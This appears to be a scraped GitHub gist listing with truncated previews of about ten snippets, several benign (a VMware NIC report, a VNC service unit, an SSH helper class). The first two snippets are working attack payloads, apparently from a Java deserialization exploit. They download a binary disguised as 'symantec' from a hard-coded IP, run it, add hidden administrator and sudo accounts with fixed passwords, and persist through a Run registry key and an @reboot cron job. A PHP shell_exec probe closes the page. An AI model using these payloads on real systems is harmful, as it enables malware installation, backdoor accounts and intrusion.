This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
this.download("http://148.251.71.182/symantec.tmp", "c:\\windows\\temp\\dllhost.exe;"); | |
String win_cmd = "Start-Process c:\\windows\\temp\\dllhost.exe;"; | |
win_cmd += "net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount; Set-LocalUser -Name DefaultAccount -PasswordNeverExpires 1;"; | |
win_cmd += "New-Itemproperty -path 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'DllHost' -value 'c:\\windows\\temp\\dllhost.exe' -PropertyType 'String' -Force;"; | |
final String[] arrayOfString = { "powershell", "-c Invoke-Command", "{" + win_cmd + "}" }; | |
try { | |
Runtime.getRuntime().exec(arrayOfString); | |
} | |
catch (IOException iOException) { | |
iOException.printStackTrace(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
this.download("http://148.251.71.182/symantec_linux.x86", "/tmp/lock"); | |
final String linux_cmd = "chmod +x /tmp/lock ; useradd -g sudo -m -s /bin/bash -p $(echo P@ssw0rd1234 | openssl passwd -1 -stdin) master; nohup /tmp/lock &"; | |
final String[] arrayOfString = { "/bin/sh", "-c", linux_cmd }; | |
try { | |
Runtime.getRuntime().exec(arrayOfString); | |
Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "(crontab -l && echo \"@reboot /tmp/lock\") | crontab -" }); | |
} catch (IOException iOException) { | |
iOException.printStackTrace(); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class RCE extends AbstractTranslet | |
{ | |
public RCE() { | |
if (File.separator.equals("/")) { | |
... | |
} else { | |
... | |
} | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
&{Get-VM | ?{$_.PowerState -eq "PoweredOn"} | %{ | |
$strVMName = $_.Name; Get-NetworkAdapter -VM $_ | | |
select @{n="VMName"; e={$strVMName}},Name,NetworkName,ConnectionState} | | |
?{$_.ConnectionState.Connected -eq $false}} | | |
Export-Csv ./nic_report.csv -NoTypeInformation -UseCulture |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Unit] | |
Description=Remote desktop service (VNC) | |
After=syslog.target network.target | |
[Service] | |
Type=simple | |
User=kali | |
PIDFile=/home/kali/.vnc/%H:%i.pid | |
ExecStartPre=/bin/sh -c '/usr/bin/vncserver -kill :%i > /dev/null 2>&1 || :' | |
ExecStart=/usr/bin/vncserver -localhost no -alwaysshared :%i |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set outputText to "" | |
set outputApplication to "" | |
set listOfProcesses to {} | |
# Get the text to type via the action script | |
set outputText to the text returned of (display dialog "Text to Type:" default answer "") | |
# Quit if nothing was input | |
if outputText is "" then | |
error number -128 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Usage: ./reachable_test.sh <ip> <port> | |
# EX: | |
# cat ips.txt | while read ip; do ./checkScript.sh $ip <interesting_port> | tee -a scan.txt; done | |
if timeout 0.8 nc -z $1 $2 2>/dev/null; then | |
echo "$1 reachable" | |
else | |
echo "$1 not reachable" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
from paramiko import SSHClient, AutoAddPolicy, RSAKey | |
from paramiko.auth_handler import AuthenticationException, SSHException | |
from pathlib import Path | |
class SSHer(): | |
def __init__(self, remote_host, user, key_path): | |
self.remote_host = remote_host | |
self.ssh_key_path = key_path |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python3 | |
import os, sys | |
from pathlib import Path | |
def parseDirectories(rootdir): | |
for subdir, dirs, files in os.walk(rootdir): | |
for file in files: | |
if ('.DS_Store' in file): | |
continue |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php echo shell_exec("id") ?> |
NewerOlder